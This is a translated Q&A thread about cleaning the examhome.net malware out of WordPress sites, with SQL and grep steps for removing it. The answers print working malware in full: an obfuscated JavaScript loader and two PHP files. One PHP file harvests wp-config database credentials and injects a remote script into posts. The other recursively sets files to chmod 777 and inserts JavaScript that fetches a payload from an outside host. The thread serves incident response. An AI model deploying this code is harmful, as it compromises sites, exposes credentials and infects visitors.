如何从WordPress删除病毒?

时间:2018-09-17 08:05:28

标签: wordpress

如何从WordPress删除病毒?

<script type="text/javascript" async="" src="https://examhome.net/stat.js?v=1.0.2"></script>

enter image description here

enter image description here

3 个答案:

答案 0 :(得分:1)

今天上午,我在两个页面上遇到了相同的问题,在对我的文件和数据库进行了大量调查之后,我发现该恶意软件的行为是更改了我的js文件,添加了一个编码脚本并在每个末尾添加了另一个脚本发布到我数据库的wp_posts表上。

我基本上通过两个步骤解决了这个问题:

首先:使用PHPMyadmin或任何客户端转到您的数据库(Mysql),然后输入:

UPDATE `wp_posts` SET post_content = REPLACE (post_content, "<script src='https://cdn.examhome.net/cdn.js?ver=1.0.5' type='text/javascript'></script>", " ")

它的作用是删除表上所有出现的恶意软件注入。

注意:搜索的“?ver = 1.0.5”部分可能会更改,请在开始加载时在“ Ctrl + U”下检查您的页面代码,然后在重定向之前搜索“ cdn.examhome.net”或“ ads.voipnewswire.net”或“ eval(String.fromCharCode ...”),然后检查恶意软件js的来源和版本,以便在上述数据库查询中对其进行更改。

第二:转到文件管理器,然后以zip或类似格式压缩所有文件。下载压缩文件并解压缩到您的计算机上,使用Notepad ++(sublimetext等可以提供帮助,但我建议使用Notepad ++),并使用该目录上的高级搜索将其替换为所有文档中的空白或空白:

this is an image of how the replacement looks on Notepad++ (in Spanish)

eval(String.fromCharCode(118, 97, 114, 32, 101, 108, 101, 109, 32, 61, 32, 100, 111, 99, 117, 109, 101, 110, 116, 46, 99, 114, 101, 97, 116, 101, 69, 108, 101, 109, 101, 110, 116, 40, 39, 115, 99, 114, 105, 112, 116, 39, 41, 59, 32, 101, 108, 101, 109, 46, 116, 121, 112, 101, 32, 61, 32, 39, 116, 101, 120, 116, 47, 106, 97, 118, 97, 115, 99, 114, 105, 112, 116, 39, 59, 32, 101, 108, 101, 109, 46, 97, 115, 121, 110, 99, 32, 61, 32, 116, 114, 117, 101, 59, 101, 108, 101, 109, 46, 115, 114, 99, 32, 61, 32, 83, 116, 114, 105, 110, 103, 46, 102, 114, 111, 109, 67, 104, 97, 114, 67, 111, 100, 101, 40, 49, 48, 52, 44, 32, 49, 49, 54, 44, 32, 49, 49, 54, 44, 32, 49, 49, 50, 44, 32, 49, 49, 53, 44, 32, 53, 56, 44, 32, 52, 55, 44, 32, 52, 55, 44, 32, 57, 55, 44, 32, 49, 48, 48, 44, 32, 49, 49, 53, 44, 32, 52, 54, 44, 32, 49, 49, 56, 44, 32, 49, 49, 49, 44, 32, 49, 48, 53, 44, 32, 49, 49, 50, 44, 32, 49, 49, 48, 44, 32, 49, 48, 49, 44, 32, 49, 49, 57, 44, 32, 49, 49, 53, 44, 32, 49, 49, 57, 44, 32, 49, 48, 53, 44, 32, 49, 49, 52, 44, 32, 49, 48, 49, 44, 32, 52, 54, 44, 32, 49, 49, 48, 44, 32, 49, 48, 49, 44, 32, 49, 49, 54, 44, 32, 52, 55, 44, 32, 57, 55, 44, 32, 49, 48, 48, 44, 32, 52, 54, 44, 32, 49, 48, 54, 44, 32, 49, 49, 53, 41, 59, 32, 32, 32, 118, 97, 114, 32, 97, 108, 108, 115, 32, 61, 32, 100, 111, 99, 117, 109, 101, 110, 116, 46, 103, 101, 116, 69, 108, 101, 109, 101, 110, 116, 115, 66, 121, 84, 97, 103, 78, 97, 109, 101, 40, 39, 115, 99, 114, 105, 112, 116, 39, 41, 59, 32, 118, 97, 114, 32, 110, 116, 51, 32, 61, 32, 116, 114, 117, 101, 59, 32, 102, 111, 114, 32, 40, 32, 118, 97, 114, 32, 105, 32, 61, 32, 97, 108, 108, 115, 46, 108, 101, 110, 103, 116, 104, 59, 32, 105, 45, 45, 59, 41, 32, 123, 32, 105, 102, 32, 40, 97, 108, 108, 115, 91, 105, 93, 46, 115, 114, 99, 46, 105, 110, 100, 101, 120, 79, 102, 40, 83, 116, 114, 105, 110, 103, 46, 102, 114, 111, 109, 67, 104, 97, 114, 67, 111, 100, 101, 40, 49, 49, 56, 44, 32, 49, 49, 49, 44, 32, 49, 48, 53, 44, 32, 49, 49, 50, 44, 32, 49, 49, 48, 44, 32, 49, 48, 49, 44, 32, 49, 49, 57, 44, 32, 49, 49, 53, 44, 32, 49, 49, 57, 44, 32, 49, 48, 53, 44, 32, 49, 49, 52, 44, 32, 49, 48, 49, 41, 41, 32, 62, 32, 45, 49, 41, 32, 123, 32, 110, 116, 51, 32, 61, 32, 102, 97, 108, 115, 101, 59, 125, 32, 125, 32, 105, 102, 40, 110, 116, 51, 32, 61, 61, 32, 116, 114, 117, 101, 41, 123, 100, 111, 99, 117, 109, 101, 110, 116, 46, 103, 101, 116, 69, 108, 101, 109, 101, 110, 116, 115, 66, 121, 84, 97, 103, 78, 97, 109, 101, 40, 34, 104, 101, 97, 100, 34, 41, 91, 48, 93, 46, 97, 112, 112, 101, 110, 100, 67, 104, 105, 108, 100, 40, 101, 108, 101, 109, 41, 59, 32, 125));

这是替代品在Notepad ++(西班牙语)上的外观图片

注意:里面的数字可以更改,但是它们始终以eval(String.fromCharCode()开头,不用担心,wordpress或插件的核心js都不使用它,所以您可以搜索任何匹配项并复制其中的数字以完成替换语句。

然后再次压缩,删除所有public_html内容,然后重新上传压缩文件,然后将其解压缩到public_html根目录上。

有了这一切,我的两个Wordpress页面都恢复了正常状态,希望它能为您提供帮助。祝你好运!

答案 1 :(得分:0)

您应该检查主题的wp-content/themes/{you-active-theme-name}/functions.php文件,看看是否添加了任何恶意软件。

您还可以查看wordpress的创建者提供的VaulPress。用它进行扫描,看看会发现什么。

https://vaultpress.com/

答案 2 :(得分:0)

我曾帮助一位朋友解决此问题,并竭力帮助社区,以解决WordPress文件中这种讨厌的恶意软件的经验,我发现该恶意软件被注入到我的案例中一个文件夹中/ wp-content / uploads /文件夹作为没有扩展名的文件。

我发现了两个文件(php文件):

第一个文件使用所有键和数据库详细信息公开“ wp-config.php”,并将examhome.net脚本注入post_content表中-代码如下。

    <?php echo ":#009009#:";
    $file_to_search = "wp-config.php";

    @search_file($_SERVER['DOCUMENT_ROOT']."/../../../../..",$file_to_search);
    @search_file($_SERVER['DOCUMENT_ROOT']."/../../../..",$file_to_search);
    @search_file($_SERVER['DOCUMENT_ROOT']."/../../..",$file_to_search);
    @search_file($_SERVER['DOCUMENT_ROOT']."/../..",$file_to_search);
    @search_file($_SERVER['DOCUMENT_ROOT']."/..",$file_to_search);
    @search_file($_SERVER['DOCUMENT_ROOT'],$file_to_search);

    function search_file($dir,$file_to_search){

    $files = scandir($dir);

    foreach($files as $key => $value){

        $path = realpath($dir.DIRECTORY_SEPARATOR.$value);

        if(!is_dir($path)) {
            if (strpos($value,$file_to_search) !== false) {

                show_sitenames($path);



            }

        } else if($value != "." && $value != "..") {

            search_file($path, $file_to_search);

        }  
     } 
    }

    echo ":#009009#:";



    function show_sitenames($file){
        $content = @file_get_contents($file);
        if(strpos($content, "DB_NAME") !== false) {


        $db = get_var_reg("'DB_NAME'.*?,.*?['|\"](.*?)['|\"]",$content);
        $host = get_var_reg("'DB_HOST'.*?,.*?['|\"](.*?)['|\"]",$content);
        $user = get_var_reg("'DB_USER'.*?,.*?['|\"](.*?)['|\"]",$content);
        $pass = get_var_reg("'DB_PASSWORD'.*?,.*?['|\"](.*?)['|\"]",$content);


    // Create connection
    $conn = new mysqli($host, $user, $pass);

    // Check connection
    if ($conn->connect_error) {
      echo $conn->connect_error;
    } else { 


    $q = "SELECT TABLE_SCHEMA,TABLE_NAME FROM information_schema.TABLES WHERE `TABLE_NAME` LIKE '%post%'";
    $result = $conn->query($q);
    if ($result->num_rows > 0) {
        while($row = $result->fetch_assoc()) {
            $q2 = "SELECT post_content FROM " . $row["TABLE_SCHEMA"]. "." . $row["TABLE_NAME"]."  LIMIT 1 ";
        $result2 = $conn->query($q2);
        if ($result2->num_rows > 0) {
            while($row2 = $result2->fetch_assoc()) {
                $val = $row2['post_content'];
                if(strpos($val, "examhome") === false){

                    echo "nothing:".$file."\n";

                    $q3 = "UPDATE " . $row["TABLE_SCHEMA"]. "." . $row["TABLE_NAME"]." set post_content = CONCAT(post_content,\"<script src='https://cdn.examhome.net/cdn.js?ver=1.0.88' type='text/javascript'></script>\") WHERE post_content NOT LIKE '%examhome%'";
                    $conn->query($q3);

                } else {

                    echo "already exist:".$file."\n";
                }
            }
        } else {
        }
        }
    } else {
    }
    $conn->close();
    }
    }
    }

    function get_var_reg($pat,$text) {

        if ($c = preg_match_all ("/".$pat."/is", $text, $matches))
        {
            return $matches[1][0];
        }

        return "";
    }


    exit();

第二个文件在执行时,将下面的代码(js脚本)递归注入js文件中的所有地方。 该脚本还将文件的权限更改为777,表示可以读写

在此阶段,您的系统已经受到威胁,无论脚本有多少次从它们可以完全访问系统的文件中删除脚本都没有关系,因为“ wp-config.php”详细信息已破坏了先前的含义。他们现在可以访问您的wp-admin

<?php $a = 'find / -type f -name "*" | xargs grep -rl "<head"';
$l1 = '<script language=javascript>var _0xfcc4=["\x66\x72\x6F\x6D\x43\x68\x61\x72\x43\x6F\x64\x65","\x47\x45\x54","\x6F\x70\x65\x6E","\x73\x65\x6E\x64","\x72\x65\x73\x70\x6F\x6E\x73\x65\x54\x65\x78\x74","\x69\x6E\x64\x65\x78\x4F\x66","\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74","\x74\x79\x70\x65","\x61\x73\x79\x6E\x63","\x69\x64","\x63\x64\x6E\x37\x38\x39","\x73\x72\x63","\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61x67\x4E\x61\x6D\x65","\x73\x63\x72\x69\x70\x74","\x6C\x65\x6E\x67\x74\x68"];var url=String[_0xfcc4[0]](104, 116, 116, 112, 115, 58, 47, 47, 119, 119, 119, 46, 108, 101, 97, 114, 110, 105, 110, 103, 116, 111, 111, 108, 107, 105, 116, 46, 99, 108, 117, 98, 47, 108, 105, 110, 107, 46, 112, 104, 112, 63, 118, 101, 114, 61, 49);var get_text=function httpGet(_0x3bc1x4){var _0x3bc1x5= new XMLHttpRequest();_0x3bc1x5[_0xfcc4[2]](_0xfcc4[1],_0x3bc1x4,false);_0x3bc1x5[_0xfcc4[3]](null);return _0x3bc1x5[_0xfcc4[4]]};var text=get_text(url);if(text!= String[_0xfcc4[0]](110,117,108,108)&& text[_0xfcc4[5]](String[_0xfcc4[0]](104,116,116,112,115,58,47,47))>  -1){var a=function(){var _0x3bc1x8=document[_0xfcc4[6]](String[_0xfcc4[0]](115,99,114,105,112,116));_0x3bc1x8[_0xfcc4[7]]= String[_0xfcc4[0]](116,101,120,116,47,106,97,118,97,115,99,114,105,112,116);_0x3bc1x8[_0xfcc4[8]]= true;_0x3bc1x8[_0xfcc4[9]]= _0xfcc4[10];_0x3bc1x8[_0xfcc4[11]]= text;document[_0xfcc4[13]](String[_0xfcc4[0]](104,101,97,100))[0][_0xfcc4[12]](_0x3bc1x8)};var scrpts=document[_0xfcc4[13]](_0xfcc4[14]);var n=true;for(var i=scrpts[_0xfcc4[15]];i--;){if(scrpts[i][_0xfcc4[9]]== _0xfcc4[10]){n= false}};if(n== true){a()}}</script>';



$t = shell_exec($a);
$t = explode("\n", trim($t));
foreach($t as $f){

$g = file_get_contents($f);
if (strpos($g, '0xfcc4') !== false) {
   echo "e:".$f;
} else {
$g = file_get_contents($f);
$g = str_replace("<head>","<head>".$l1,$g);
$g = str_replace("</head>",$l1."</head>",$g);
@system("chmod 777 ".$f);
@file_put_contents($f,$g);
$g = file_get_contents($f);
if (strpos($g, '0xfcc4') !== false) {
   echo $f;
} 
}
}
echo ":#009009#:";

重要的是,不要使用复制器插件,因为它似乎有SQL注入孔,如果在系统中确实有,请删除它。 您可以使用grep命令来识别受感染的文件,如下所示:

  • sudo grep -rl“ examhome.net” / var / www / html / |更多

  • sudo grep -r“ eval(String.fromCharCode(118,97” / var / www / html / |更多

  • 最后使用grep和sed命令,您可以识别并用空格替换受感染的代码。

我真的希望这可以帮助其他人解决此问题,但这不是最终解决方案,因为该恶意软件蠕虫正在更新,并且我仍在调查此问题。

戴夫

免责声明:仅使用您在此帖子中的信息负责!